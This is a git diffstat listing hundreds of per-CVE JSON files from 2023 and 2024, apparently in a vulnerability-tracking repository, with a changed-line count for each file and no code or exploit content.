2023/CVE-2023-50132.json | 3 +- 2023/CVE-2023-50164.json | 39 +- 2023/CVE-2023-50226.json | 3 +- 2023/CVE-2023-5024.json | 3 +- 2023/CVE-2023-50245.json | 3 +- 2023/CVE-2023-50254.json | 3 +- 2023/CVE-2023-50386.json | 3 +- 2023/CVE-2023-50387.json | 6 +- 2023/CVE-2023-5043.json | 3 +- 2023/CVE-2023-5044.json | 9 +- 2023/CVE-2023-50465.json | 3 +- 2023/CVE-2023-50564.json | 15 +- 2023/CVE-2023-50596.json | 3 +- 2023/CVE-2023-50643.json | 3 +- 2023/CVE-2023-50685.json | 3 +- 2023/CVE-2023-5070.json | 3 +- 2023/CVE-2023-50868.json | 3 +- 2023/CVE-2023-5089.json | 3 +- 2023/CVE-2023-50917.json | 3 +- 2023/CVE-2023-51000.json | 3 +- 2023/CVE-2023-51073.json | 3 +- 2023/CVE-2023-51119.json | 3 +- 2023/CVE-2023-51126.json | 3 +- 2023/CVE-2023-51127.json | 3 +- 2023/CVE-2023-51214.json | 3 +- 2023/CVE-2023-51281.json | 3 +- 2023/CVE-2023-51385.json | 60 +- 2023/CVE-2023-51409.json | 3 +- 2023/CVE-2023-5142.json | 3 +- 2023/CVE-2023-51448.json | 3 +- 2023/CVE-2023-51467.json | 27 +- 2023/CVE-2023-51504.json | 3 +- 2023/CVE-2023-51518.json | 3 +- 2023/CVE-2023-51764.json | 12 +- 2023/CVE-2023-5178.json | 3 +- 2023/CVE-2023-51800.json | 3 +- 2023/CVE-2023-51801.json | 3 +- 2023/CVE-2023-51802.json | 3 +- 2023/CVE-2023-51810.json | 3 +- 2023/CVE-2023-5204.json | 3 +- 2023/CVE-2023-52160.json | 3 +- 2023/CVE-2023-5217.json | 9 +- 2023/CVE-2023-52251.json | 3 +- 2023/CVE-2023-52268.json | 3 +- 2023/CVE-2023-52654.json | 3 +- 2023/CVE-2023-52709.json | 3 +- 2023/CVE-2023-5324.json | 3 +- 2023/CVE-2023-5360.json | 27 +- 2023/CVE-2023-5412.json | 3 +- 2023/CVE-2023-5521.json | 3 +- 2023/CVE-2023-5538.json | 3 +- 2023/CVE-2023-5539.json | 3 +- 2023/CVE-2023-5540.json | 3 +- 2023/CVE-2023-5546.json | 3 +- 2023/CVE-2023-5561.json | 3 +- 2023/CVE-2023-5717.json | 3 +- 2023/CVE-2023-5720.json | 9 +- 2023/CVE-2023-5808.json | 3 +- 2023/CVE-2023-5961.json | 3 +- 2023/CVE-2023-5965.json | 3 +- 2023/CVE-2023-5966.json | 3 +- 2023/CVE-2023-6019.json | 15 +- 2023/CVE-2023-6036.json | 3 +- 2023/CVE-2023-6063.json | 9 +- 2023/CVE-2023-6241.json | 9 +- 2023/CVE-2023-6246.json | 3 +- 2023/CVE-2023-6275.json | 3 +- 2023/CVE-2023-6289.json | 3 +- 2023/CVE-2023-6319.json | 3 +- 2023/CVE-2023-6350.json | 3 +- 2023/CVE-2023-6421.json | 3 +- 2023/CVE-2023-6444.json | 3 +- 2023/CVE-2023-6538.json | 3 +- 2023/CVE-2023-6553.json | 12 +- 2023/CVE-2023-6567.json | 3 +- 2023/CVE-2023-6595.json | 3 +- 2023/CVE-2023-6634.json | 3 +- 2023/CVE-2023-6654.json | 3 +- 2023/CVE-2023-6661.json | 3 +- 2023/CVE-2023-6663.json | 3 +- 2023/CVE-2023-6700.json | 3 +- 2023/CVE-2023-6702.json | 3 +- 2023/CVE-2023-6710.json | 6 +- 2023/CVE-2023-6875.json | 9 +- 2023/CVE-2023-6895.json | 6 +- 2023/CVE-2023-6933.json | 3 +- 2023/CVE-2023-6985.json | 3 +- 2023/CVE-2023-7016.json | 3 +- 2023/CVE-2023-7028.json | 39 +- 2023/CVE-2023-7172.json | 3 +- 2023/CVE-2023-7173.json | 3 +- 2024/CVE-2024-0015.json | 3 +- 2024/CVE-2024-0023.json | 6 +- 2024/CVE-2024-0030.json | 3 +- 2024/CVE-2024-0039.json | 3 +- 2024/CVE-2024-0040.json | 6 +- 2024/CVE-2024-0044.json | 30 +- 2024/CVE-2024-0049.json | 6 +- 2024/CVE-2024-0195.json | 12 +- 2024/CVE-2024-0197.json | 3 +- 2024/CVE-2024-0204.json | 12 +- 2024/CVE-2024-0230.json | 3 +- 2024/CVE-2024-0235.json | 3 +- 2024/CVE-2024-0305.json | 3 +- 2024/CVE-2024-0324.json | 3 +- 2024/CVE-2024-0352.json | 3 +- 2024/CVE-2024-0379.json | 3 +- 2024/CVE-2024-0399.json | 3 +- 2024/CVE-2024-0507.json | 3 +- 2024/CVE-2024-0509.json | 3 +- 2024/CVE-2024-0566.json | 3 +- 2024/CVE-2024-0582.json | 12 +- 2024/CVE-2024-0588.json | 3 +- 2024/CVE-2024-0590.json | 3 +- 2024/CVE-2024-0623.json | 3 +- 2024/CVE-2024-0624.json | 3 +- 2024/CVE-2024-0679.json | 3 +- 2024/CVE-2024-0684.json | 3 +- 2024/CVE-2024-0710.json | 3 +- 2024/CVE-2024-0713.json | 3 +- 2024/CVE-2024-0741.json | 3 +- 2024/CVE-2024-0757.json | 3 +- 2024/CVE-2024-0762.json | 3 +- 2024/CVE-2024-0783.json | 3 +- 2024/CVE-2024-0944.json | 3 +- 2024/CVE-2024-0986.json | 3 +- 2024/CVE-2024-1071.json | 18 +- 2024/CVE-2024-1086.json | 18 +- 2024/CVE-2024-1112.json | 3 +- 2024/CVE-2024-1207.json | 3 +- 2024/CVE-2024-1208.json | 6 +- 2024/CVE-2024-1209.json | 3 +- 2024/CVE-2024-1212.json | 6 +- 2024/CVE-2024-1269.json | 3 +- 2024/CVE-2024-12883.json | 3 +- 2024/CVE-2024-1301.json | 3 +- 2024/CVE-2024-1302.json | 3 +- 2024/CVE-2024-1303.json | 3 +- 2024/CVE-2024-1304.json | 3 +- 2024/CVE-2024-1346.json | 3 +- 2024/CVE-2024-1380.json | 3 +- 2024/CVE-2024-1403.json | 3 +- 2024/CVE-2024-1441.json | 3 +- 2024/CVE-2024-1512.json | 3 +- 2024/CVE-2024-1561.json | 6 +- 2024/CVE-2024-1642470.json | 3 +- 2024/CVE-2024-1651.json | 9 +- 2024/CVE-2024-1655.json | 3 +- 2024/CVE-2024-1698.json | 6 +- 2024/CVE-2024-1709.json | 18 +- 2024/CVE-2024-1781.json | 3 +- 2024/CVE-2024-1874.json | 6 +- 2024/CVE-2024-1931.json | 3 +- 2024/CVE-2024-1939.json | 3 +- 2024/CVE-2024-20017.json | 3 +- 2024/CVE-2024-20291.json | 3 +- 2024/CVE-2024-20338.json | 3 +- 2024/CVE-2024-20356.json | 6 +- 2024/CVE-2024-20404.json | 3 +- 2024/CVE-2024-20405.json | 3 +- 2024/CVE-2024-20467.json | 3 +- 2024/CVE-2024-2054.json | 3 +- 2024/CVE-2024-20656.json | 3 +- 2024/CVE-2024-20666.json | 6 +- 2024/CVE-2024-20696.json | 3 +- 2024/CVE-2024-20698.json | 3 +- 2024/CVE-2024-2074.json | 3 +- 2024/CVE-2024-20746.json | 3 +- 2024/CVE-2024-20767.json | 12 +- 2024/CVE-2024-20931.json | 12 +- 2024/CVE-2024-21006.json | 9 +- 2024/CVE-2024-21107.json | 3 +- 2024/CVE-2024-21111.json | 9 +- 2024/CVE-2024-21305.json | 3 +- 2024/CVE-2024-21306.json | 6 +- 2024/CVE-2024-21338.json | 18 +- 2024/CVE-2024-21345.json | 6 +- 2024/CVE-2024-21378.json | 3 +- 2024/CVE-2024-21388.json | 3 +- 2024/CVE-2024-21412.json | 3 +- 2024/CVE-2024-21413.json | 45 +- 2024/CVE-2024-21514.json | 3 +- 2024/CVE-2024-21520.json | 3 +- 2024/CVE-2024-21626.json | 36 +- 2024/CVE-2024-21633.json | 3 +- 2024/CVE-2024-21644.json | 3 +- 2024/CVE-2024-21683.json | 15 +- 2024/CVE-2024-21689.json | 3 +- 2024/CVE-2024-2169.json | 3 +- 2024/CVE-2024-21733.json | 3 +- 2024/CVE-2024-21754.json | 3 +- 2024/CVE-2024-21762.json | 21 +- 2024/CVE-2024-21793.json | 3 +- 2024/CVE-2024-2188.json | 3 +- 2024/CVE-2024-21887.json | 21 +- 2024/CVE-2024-21893.json | 6 +- 2024/CVE-2024-2193.json | 3 +- 2024/CVE-2024-21978.json | 3 +- 2024/CVE-2024-21980.json | 3 +- 2024/CVE-2024-22002.json | 3 +- 2024/CVE-2024-22024.json | 3 +- 2024/CVE-2024-22026.json | 3 +- 2024/CVE-2024-22120.json | 9 +- 2024/CVE-2024-22145.json | 3 +- 2024/CVE-2024-22198.json | 3 +- 2024/CVE-2024-22243.json | 6 +- 2024/CVE-2024-22263.json | 3 +- 2024/CVE-2024-22274.json | 12 +- 2024/CVE-2024-22275.json | 3 +- 2024/CVE-2024-22369.json | 3 +- 2024/CVE-2024-22393.json | 3 +- 2024/CVE-2024-22411.json | 3 +- 2024/CVE-2024-22416.json | 3 +- 2024/CVE-2024-22514.json | 3 +- 2024/CVE-2024-22515.json | 6 +- 2024/CVE-2024-22526.json | 3 +- 2024/CVE-2024-22532.json | 3 +- 2024/CVE-2024-22534.json | 3 +- 2024/CVE-2024-2257.json | 3 +- 2024/CVE-2024-22640.json | 3 +- 2024/CVE-2024-22641.json | 3 +- 2024/CVE-2024-22752.json | 3 +- 2024/CVE-2024-22774.json | 3 +- 2024/CVE-2024-22853.json | 3 +- 2024/CVE-2024-22867.json | 3 +- 2024/CVE-2024-22889.json | 3 +- 2024/CVE-2024-22890.json | 3 +- 2024/CVE-2024-22891.json | 3 +- 2024/CVE-2024-22894.json | 3 +- 2024/CVE-2024-22899.json | 3 +- 2024/CVE-2024-22909.json | 3 +- 2024/CVE-2024-22922.json | 3 +- 2024/CVE-2024-22939.json | 3 +- 2024/CVE-2024-22983.json | 3 +- 2024/CVE-2024-23002.json | 3 +- 2024/CVE-2024-23108.json | 6 +- 2024/CVE-2024-23113.json | 12 +- 2024/CVE-2024-23208.json | 3 +- 2024/CVE-2024-23334.json | 21 +- 2024/CVE-2024-23339.json | 3 +- 2024/CVE-2024-23443.json | 3 +- 2024/CVE-2024-23652.json | 3 +- 2024/CVE-2024-23692.json | 30 +- 2024/CVE-2024-23708.json | 3 +- 2024/CVE-2024-23709.json | 3 +- 2024/CVE-2024-23722.json | 3 +- 2024/CVE-2024-23727.json | 3 +- 2024/CVE-2024-23738.json | 3 +- 2024/CVE-2024-23739.json | 3 +- 2024/CVE-2024-23740.json | 3 +- 2024/CVE-2024-23741.json | 3 +- 2024/CVE-2024-23742.json | 3 +- 2024/CVE-2024-23743.json | 3 +- 2024/CVE-2024-23745.json | 3 +- 2024/CVE-2024-23746.json | 3 +- 2024/CVE-2024-23747.json | 3 +- 2024/CVE-2024-23772.json | 3 +- 2024/CVE-2024-23773.json | 3 +- 2024/CVE-2024-23774.json | 3 +- 2024/CVE-2024-23780.json | 3 +- 2024/CVE-2024-2389.json | 3 +- 2024/CVE-2024-23897.json | 102 ++-- 2024/CVE-2024-23995.json | 3 +- 2024/CVE-2024-23997.json | 3 +- 2024/CVE-2024-23998.json | 3 +- 2024/CVE-2024-24034.json | 3 +- 2024/CVE-2024-24035.json | 3 +- 2024/CVE-2024-24134.json | 3 +- 2024/CVE-2024-24135.json | 3 +- 2024/CVE-2024-24136.json | 3 +- 2024/CVE-2024-24137.json | 3 +- 2024/CVE-2024-24138.json | 3 +- 2024/CVE-2024-24139.json | 3 +- 2024/CVE-2024-24140.json | 3 +- 2024/CVE-2024-24141.json | 3 +- 2024/CVE-2024-24142.json | 3 +- 2024/CVE-2024-2432.json | 3 +- 2024/CVE-2024-24336.json | 3 +- 2024/CVE-2024-24337.json | 3 +- 2024/CVE-2024-24386.json | 3 +- 2024/CVE-2024-24396.json | 3 +- 2024/CVE-2024-24397.json | 3 +- 2024/CVE-2024-24398.json | 3 +- 2024/CVE-2024-24401.json | 3 +- 2024/CVE-2024-24402.json | 3 +- 2024/CVE-2024-24409.json | 3 +- 2024/CVE-2024-24488.json | 3 +- 2024/CVE-2024-24520.json | 3 +- 2024/CVE-2024-24549.json | 3 +- 2024/CVE-2024-24576.json | 27 +- 2024/CVE-2024-24590.json | 21 +- 2024/CVE-2024-24684.json | 3 +- 2024/CVE-2024-24685.json | 3 +- 2024/CVE-2024-24686.json | 3 +- 2024/CVE-2024-24760.json | 3 +- 2024/CVE-2024-24787.json | 3 +- 2024/CVE-2024-24809.json | 3 +- 2024/CVE-2024-24816.json | 3 +- 2024/CVE-2024-24919.json | 159 +++-- 2024/CVE-2024-25092.json | 3 +- 2024/CVE-2024-25153.json | 6 +- 2024/CVE-2024-25169.json | 3 +- 2024/CVE-2024-25170.json | 3 +- 2024/CVE-2024-25175.json | 3 +- 2024/CVE-2024-25202.json | 3 +- 2024/CVE-2024-25227.json | 6 +- 2024/CVE-2024-25270.json | 3 +- 2024/CVE-2024-25277.json | 3 +- 2024/CVE-2024-25278.json | 3 +- 2024/CVE-2024-25279.json | 3 +- 2024/CVE-2024-25280.json | 3 +- 2024/CVE-2024-25281.json | 3 +- 2024/CVE-2024-25291.json | 3 +- 2024/CVE-2024-25292.json | 3 +- 2024/CVE-2024-25293.json | 3 +- 2024/CVE-2024-25376.json | 3 +- 2024/CVE-2024-25381.json | 3 +- 2024/CVE-2024-25411.json | 3 +- 2024/CVE-2024-25412.json | 3 +- 2024/CVE-2024-25423.json | 3 +- 2024/CVE-2024-25466.json | 3 +- 2024/CVE-2024-25503.json | 3 +- 2024/CVE-2024-25600.json | 36 +- 2024/CVE-2024-25641.json | 12 +- 2024/CVE-2024-25723.json | 3 +- 2024/CVE-2024-25731.json | 3 +- 2024/CVE-2024-25733.json | 3 +- 2024/CVE-2024-25809.json | 3 +- 2024/CVE-2024-25832.json | 3 +- 2024/CVE-2024-25897.json | 3 +- 2024/CVE-2024-26026.json | 6 +- 2024/CVE-2024-26144.json | 3 +- 2024/CVE-2024-26160.json | 3 +- 2024/CVE-2024-26218.json | 3 +- 2024/CVE-2024-26229.json | 26 +- 2024/CVE-2024-26230.json | 6 +- 2024/CVE-2024-26304.json | 6 +- 2024/CVE-2024-26308.json | 3 +- 2024/CVE-2024-26475.json | 3 +- 2024/CVE-2024-26503.json | 3 +- 2024/CVE-2024-26521.json | 3 +- 2024/CVE-2024-26534.json | 3 +- 2024/CVE-2024-26535.json | 3 +- 2024/CVE-2024-26560.json | 3 +- 2024/CVE-2024-26574.json | 3 +- 2024/CVE-2024-26581.json | 6 +- 2024/CVE-2024-2667.json | 3 +- 2024/CVE-2024-26817.json | 3 +- 2024/CVE-2024-27088.json | 3 +- 2024/CVE-2024-27130.json | 6 +- 2024/CVE-2024-27173.json | 3 +- 2024/CVE-2024-27198.json | 39 +- 2024/CVE-2024-27282.json | 3 +- 2024/CVE-2024-27292.json | 3 +- 2024/CVE-2024-27316.json | 6 +- 2024/CVE-2024-27348.json | 9 +- 2024/CVE-2024-27460.json | 9 +- 2024/CVE-2024-27462.json | 3 +- 2024/CVE-2024-27474.json | 3 +- 2024/CVE-2024-27518.json | 3 +- 2024/CVE-2024-27564.json | 6 +- 2024/CVE-2024-27619.json | 3 +- 2024/CVE-2024-27630.json | 3 +- 2024/CVE-2024-27631.json | 3 +- 2024/CVE-2024-27632.json | 3 +- 2024/CVE-2024-27665.json | 3 +- 2024/CVE-2024-27673.json | 3 +- 2024/CVE-2024-27674.json | 3 +- 2024/CVE-2024-27697.json | 3 +- 2024/CVE-2024-27766.json | 3 +- 2024/CVE-2024-27804.json | 3 +- 2024/CVE-2024-27815.json | 3 +- 2024/CVE-2024-27956.json | 39 +- 2024/CVE-2024-27971.json | 3 +- 2024/CVE-2024-27972.json | 3 +- 2024/CVE-2024-27983.json | 3 +- 2024/CVE-2024-28000.json | 15 +- 2024/CVE-2024-28085.json | 6 +- 2024/CVE-2024-28088.json | 3 +- 2024/CVE-2024-28116.json | 9 +- 2024/CVE-2024-28247.json | 3 +- 2024/CVE-2024-28255.json | 3 +- 2024/CVE-2024-28397.json | 6 +- 2024/CVE-2024-28515.json | 3 +- 2024/CVE-2024-28589.json | 3 +- 2024/CVE-2024-28715.json | 3 +- 2024/CVE-2024-28741.json | 3 +- 2024/CVE-2024-28757.json | 9 +- 2024/CVE-2024-2876.json | 12 +- 2024/CVE-2024-2879.json | 3 +- 2024/CVE-2024-2887.json | 6 +- 2024/CVE-2024-28987.json | 40 +- 2024/CVE-2024-28995.json | 27 +- 2024/CVE-2024-28999.json | 3 +- 2024/CVE-2024-29050.json | 3 +- 2024/CVE-2024-29059.json | 3 +- 2024/CVE-2024-29269.json | 21 +- 2024/CVE-2024-29272.json | 3 +- 2024/CVE-2024-29275.json | 3 +- 2024/CVE-2024-29278.json | 3 +- 2024/CVE-2024-29296.json | 6 +- 2024/CVE-2024-29375.json | 3 +- 2024/CVE-2024-29399.json | 3 +- 2024/CVE-2024-29415.json | 3 +- 2024/CVE-2024-29510.json | 3 +- 2024/CVE-2024-2961.json | 21 +- 2024/CVE-2024-29824.json | 6 +- 2024/CVE-2024-29847.json | 3 +- 2024/CVE-2024-29849.json | 3 +- 2024/CVE-2024-29855.json | 3 +- 2024/CVE-2024-29863.json | 3 +- 2024/CVE-2024-29868.json | 3 +- 2024/CVE-2024-29895.json | 12 +- 2024/CVE-2024-29943.json | 3 +- 2024/CVE-2024-2997.json | 3 +- 2024/CVE-2024-29972.json | 6 +- 2024/CVE-2024-29973.json | 18 +- 2024/CVE-2024-29988.json | 3 +- 2024/CVE-2024-30043.json | 3 +- 2024/CVE-2024-30051.json | 3 +- 2024/CVE-2024-30052.json | 3 +- 2024/CVE-2024-30056.json | 3 +- 2024/CVE-2024-30088.json | 18 +- 2024/CVE-2024-30090.json | 15 +- 2024/CVE-2024-30212.json | 3 +- 2024/CVE-2024-30255.json | 3 +- 2024/CVE-2024-30270.json | 3 +- 2024/CVE-2024-30491.json | 3 +- 2024/CVE-2024-30614.json | 3 +- 2024/CVE-2024-30656.json | 3 +- 2024/CVE-2024-30850.json | 3 +- 2024/CVE-2024-30851.json | 3 +- 2024/CVE-2024-30875.json | 3 +- 2024/CVE-2024-30896.json | 3 +- 2024/CVE-2024-3094.json | 180 ++++-- 2024/CVE-2024-30956.json | 3 +- 2024/CVE-2024-30973.json | 3 +- 2024/CVE-2024-30998.json | 3 +- 2024/CVE-2024-3105.json | 3 +- 2024/CVE-2024-3116.json | 3 +- 2024/CVE-2024-31210.json | 3 +- 2024/CVE-2024-31211.json | 3 +- 2024/CVE-2024-31319.json | 3 +- 2024/CVE-2024-31351.json | 3 +- 2024/CVE-2024-31497.json | 9 +- 2024/CVE-2024-31666.json | 3 +- 2024/CVE-2024-31719.json | 3 +- 2024/CVE-2024-3177.json | 3 +- 2024/CVE-2024-31771.json | 3 +- 2024/CVE-2024-31777.json | 3 +- 2024/CVE-2024-31819.json | 6 +- 2024/CVE-2024-3183.json | 3 +- 2024/CVE-2024-31835.json | 3 +- 2024/CVE-2024-31848.json | 3 +- 2024/CVE-2024-31974.json | 3 +- 2024/CVE-2024-31982.json | 9 +- 2024/CVE-2024-31989.json | 3 +- 2024/CVE-2024-32002.json | 187 ++++-- 2024/CVE-2024-32004.json | 6 +- 2024/CVE-2024-32030.json | 3 +- 2024/CVE-2024-32104.json | 3 +- 2024/CVE-2024-32113.json | 9 +- 2024/CVE-2024-32136.json | 3 +- 2024/CVE-2024-3217.json | 3 +- 2024/CVE-2024-32205.json | 3 +- 2024/CVE-2024-32238.json | 6 +- 2024/CVE-2024-32258.json | 3 +- 2024/CVE-2024-32369.json | 3 +- 2024/CVE-2024-32370.json | 3 +- 2024/CVE-2024-32371.json | 3 +- 2024/CVE-2024-32399.json | 3 +- 2024/CVE-2024-32459.json | 3 +- 2024/CVE-2024-32523.json | 3 +- 2024/CVE-2024-32640.json | 9 +- 2024/CVE-2024-32651.json | 6 +- 2024/CVE-2024-32700.json | 3 +- 2024/CVE-2024-32709.json | 3 +- 2024/CVE-2024-3272.json | 6 +- 2024/CVE-2024-3273.json | 27 +- 2024/CVE-2024-3293.json | 3 +- 2024/CVE-2024-33111.json | 3 +- 2024/CVE-2024-33113.json | 6 +- 2024/CVE-2024-33209.json | 3 +- 2024/CVE-2024-33210.json | 3 +- 2024/CVE-2024-33352.json | 3 +- 2024/CVE-2024-33438.json | 3 +- 2024/CVE-2024-33453.json | 3 +- 2024/CVE-2024-33559.json | 3 +- 2024/CVE-2024-33644.json | 3 +- 2024/CVE-2024-33722.json | 3 +- 2024/CVE-2024-33775.json | 3 +- 2024/CVE-2024-33883.json | 3 +- 2024/CVE-2024-33911.json | 3 +- 2024/CVE-2024-3400.json | 105 ++-- 2024/CVE-2024-34102.json | 60 +- 2024/CVE-2024-34144.json | 3 +- 2024/CVE-2024-34220.json | 3 +- 2024/CVE-2024-34221.json | 3 +- 2024/CVE-2024-34222.json | 3 +- 2024/CVE-2024-34223.json | 3 +- 2024/CVE-2024-34224.json | 3 +- 2024/CVE-2024-34225.json | 3 +- 2024/CVE-2024-34226.json | 3 +- 2024/CVE-2024-34310.json | 3 +- 2024/CVE-2024-34312.json | 3 +- 2024/CVE-2024-34313.json | 3 +- 2024/CVE-2024-34329.json | 3 +- 2024/CVE-2024-3435.json | 3 +- 2024/CVE-2024-34350.json | 3 +- 2024/CVE-2024-34351.json | 6 +- 2024/CVE-2024-34361.json | 3 +- 2024/CVE-2024-34452.json | 3 +- 2024/CVE-2024-34463.json | 3 +- 2024/CVE-2024-34469.json | 3 +- 2024/CVE-2024-34470.json | 15 +- 2024/CVE-2024-34471.json | 3 +- 2024/CVE-2024-34472.json | 3 +- 2024/CVE-2024-34474.json | 3 +- 2024/CVE-2024-34582.json | 3 +- 2024/CVE-2024-34693.json | 6 +- 2024/CVE-2024-34716.json | 3 +- 2024/CVE-2024-34739.json | 3 +- 2024/CVE-2024-34741.json | 3 +- 2024/CVE-2024-34831.json | 3 +- 2024/CVE-2024-34832.json | 3 +- 2024/CVE-2024-34833.json | 3 +- 2024/CVE-2024-3495.json | 6 +- 2024/CVE-2024-34958.json | 3 +- 2024/CVE-2024-35205.json | 3 +- 2024/CVE-2024-35242.json | 3 +- 2024/CVE-2024-35250.json | 13 +- 2024/CVE-2024-35315.json | 3 +- 2024/CVE-2024-35333.json | 3 +- 2024/CVE-2024-35468.json | 3 +- 2024/CVE-2024-35469.json | 3 +- 2024/CVE-2024-35475.json | 3 +- 2024/CVE-2024-35511.json | 3 +- 2024/CVE-2024-3552.json | 3 +- 2024/CVE-2024-35538.json | 3 +- 2024/CVE-2024-35584.json | 3 +- 2024/CVE-2024-3596.json | 3 +- 2024/CVE-2024-36079.json | 3 +- 2024/CVE-2024-36104.json | 3 +- 2024/CVE-2024-36401.json | 42 +- 2024/CVE-2024-36416.json | 3 +- 2024/CVE-2024-36424.json | 3 +- 2024/CVE-2024-36527.json | 3 +- 2024/CVE-2024-36539.json | 3 +- 2024/CVE-2024-3656.json | 3 +- 2024/CVE-2024-36821.json | 3 +- 2024/CVE-2024-36837.json | 6 +- 2024/CVE-2024-36842.json | 3 +- 2024/CVE-2024-36877.json | 6 +- 2024/CVE-2024-36991.json | 15 +- 2024/CVE-2024-37032.json | 6 +- 2024/CVE-2024-37051.json | 6 +- 2024/CVE-2024-37081.json | 12 +- 2024/CVE-2024-37084.json | 12 +- 2024/CVE-2024-37085.json | 12 +- 2024/CVE-2024-37147.json | 3 +- 2024/CVE-2024-37393.json | 3 +- 2024/CVE-2024-37713.json | 3 +- 2024/CVE-2024-37726.json | 6 +- 2024/CVE-2024-37742.json | 3 +- 2024/CVE-2024-37759.json | 3 +- 2024/CVE-2024-37762.json | 3 +- 2024/CVE-2024-37763.json | 3 +- 2024/CVE-2024-37764.json | 3 +- 2024/CVE-2024-37765.json | 3 +- 2024/CVE-2024-37770.json | 3 +- 2024/CVE-2024-37791.json | 3 +- 2024/CVE-2024-37843.json | 3 +- 2024/CVE-2024-37888.json | 3 +- 2024/CVE-2024-37889.json | 3 +- 2024/CVE-2024-38036.json | 3 +- 2024/CVE-2024-38041.json | 3 +- 2024/CVE-2024-3806.json | 3 +- 2024/CVE-2024-38063.json | 72 ++- 2024/CVE-2024-38077.json | 36 +- 2024/CVE-2024-38080.json | 3 +- 2024/CVE-2024-38100.json | 3 +- 2024/CVE-2024-38127.json | 3 +- 2024/CVE-2024-38144.json | 3 +- 2024/CVE-2024-38189.json | 3 +- 2024/CVE-2024-38200.json | 3 +- 2024/CVE-2024-38366.json | 3 +- 2024/CVE-2024-38396.json | 3 +- 2024/CVE-2024-38472.json | 6 +- 2024/CVE-2024-38473.json | 6 +- 2024/CVE-2024-38475.json | 3 +- 2024/CVE-2024-38526.json | 3 +- 2024/CVE-2024-38537.json | 3 +- 2024/CVE-2024-3867.json | 3 +- 2024/CVE-2024-38793.json | 3 +- 2024/CVE-2024-38816.json | 9 +- 2024/CVE-2024-38856.json | 18 +- 2024/CVE-2024-39031.json | 3 +- 2024/CVE-2024-39069.json | 3 +- 2024/CVE-2024-39081.json | 3 +- 2024/CVE-2024-39203.json | 3 +- 2024/CVE-2024-39210.json | 3 +- 2024/CVE-2024-39211.json | 3 +- 2024/CVE-2024-3922.json | 3 +- 2024/CVE-2024-39248.json | 3 +- 2024/CVE-2024-39250.json | 3 +- 2024/CVE-2024-39304.json | 3 +- 2024/CVE-2024-39306.json | 3 +- 2024/CVE-2024-39614.json | 3 +- 2024/CVE-2024-39689.json | 3 +- 2024/CVE-2024-39700.json | 3 +- 2024/CVE-2024-39844.json | 3 +- 2024/CVE-2024-39929.json | 6 +- 2024/CVE-2024-39943.json | 3 +- 2024/CVE-2024-40080.json | 3 +- 2024/CVE-2024-40110.json | 3 +- 2024/CVE-2024-40119.json | 3 +- 2024/CVE-2024-40318.json | 3 +- 2024/CVE-2024-40324.json | 3 +- 2024/CVE-2024-40348.json | 3 +- 2024/CVE-2024-4040.json | 42 +- 2024/CVE-2024-40422.json | 6 +- 2024/CVE-2024-40431.json | 15 +- 2024/CVE-2024-40492.json | 3 +- 2024/CVE-2024-40498.json | 3 +- 2024/CVE-2024-40500.json | 3 +- 2024/CVE-2024-40506.json | 3 +- 2024/CVE-2024-40507.json | 3 +- 2024/CVE-2024-40508.json | 3 +- 2024/CVE-2024-40509.json | 3 +- 2024/CVE-2024-40510.json | 3 +- 2024/CVE-2024-40511.json | 3 +- 2024/CVE-2024-40512.json | 3 +- 2024/CVE-2024-40617.json | 3 +- 2024/CVE-2024-40658.json | 3 +- 2024/CVE-2024-40662.json | 3 +- 2024/CVE-2024-40673.json | 3 +- 2024/CVE-2024-40675.json | 3 +- 2024/CVE-2024-40676.json | 6 +- 2024/CVE-2024-40711.json | 6 +- 2024/CVE-2024-40725.json | 3 +- 2024/CVE-2024-40892.json | 3 +- 2024/CVE-2024-41107.json | 3 +- 2024/CVE-2024-41110.json | 6 +- 2024/CVE-2024-41276.json | 3 +- 2024/CVE-2024-41290.json | 3 +- 2024/CVE-2024-41301.json | 3 +- 2024/CVE-2024-41302.json | 3 +- 2024/CVE-2024-41312.json | 3 +- 2024/CVE-2024-41570.json | 3 +- 2024/CVE-2024-41628.json | 3 +- 2024/CVE-2024-41640.json | 3 +- 2024/CVE-2024-41651.json | 3 +- 2024/CVE-2024-41662.json | 3 +- 2024/CVE-2024-41958.json | 3 +- 2024/CVE-2024-41992.json | 3 +- 2024/CVE-2024-4231.json | 3 +- 2024/CVE-2024-4232.json | 6 +- 2024/CVE-2024-42461.json | 3 +- 2024/CVE-2024-42640.json | 3 +- 2024/CVE-2024-42642.json | 3 +- 2024/CVE-2024-42657.json | 3 +- 2024/CVE-2024-42658.json | 3 +- 2024/CVE-2024-42758.json | 3 +- 2024/CVE-2024-42834.json | 3 +- 2024/CVE-2024-42845.json | 3 +- 2024/CVE-2024-42849.json | 3 +- 2024/CVE-2024-42850.json | 3 +- 2024/CVE-2024-42861.json | 3 +- 2024/CVE-2024-42919.json | 3 +- 2024/CVE-2024-4295.json | 6 +- 2024/CVE-2024-42992.json | 3 +- 2024/CVE-2024-43035.json | 3 +- 2024/CVE-2024-43044.json | 12 +- 2024/CVE-2024-43160.json | 3 +- 2024/CVE-2024-4320.json | 3 +- 2024/CVE-2024-4323.json | 9 +- 2024/CVE-2024-43363.json | 3 +- 2024/CVE-2024-43425.json | 3 +- 2024/CVE-2024-4352.json | 3 +- 2024/CVE-2024-4358.json | 18 +- 2024/CVE-2024-43582.json | 3 +- 2024/CVE-2024-4367.json | 27 +- 2024/CVE-2024-43917.json | 3 +- 2024/CVE-2024-43918.json | 3 +- 2024/CVE-2024-43998.json | 3 +- 2024/CVE-2024-44000.json | 12 +- 2024/CVE-2024-4406.json | 3 +- 2024/CVE-2024-44083.json | 3 +- 2024/CVE-2024-44193.json | 11 +- 2024/CVE-2024-44337.json | 3 +- 2024/CVE-2024-44346.json | 6 +- 2024/CVE-2024-44349.json | 3 +- 2024/CVE-2024-4439.json | 12 +- 2024/CVE-2024-4443.json | 3 +- 2024/CVE-2024-44450.json | 3 +- 2024/CVE-2024-44541.json | 3 +- 2024/CVE-2024-44542.json | 3 +- 2024/CVE-2024-44610.json | 3 +- 2024/CVE-2024-44623.json | 3 +- 2024/CVE-2024-44812.json | 3 +- 2024/CVE-2024-44815.json | 3 +- 2024/CVE-2024-4484.json | 3 +- 2024/CVE-2024-44849.json | 3 +- 2024/CVE-2024-44867.json | 3 +- 2024/CVE-2024-44902.json | 3 +- 2024/CVE-2024-44946.json | 3 +- 2024/CVE-2024-44947.json | 3 +- 2024/CVE-2024-45058.json | 3 +- 2024/CVE-2024-45200.json | 3 +- 2024/CVE-2024-45241.json | 6 +- 2024/CVE-2024-45244.json | 6 +- 2024/CVE-2024-45264.json | 3 +- 2024/CVE-2024-45265.json | 3 +- 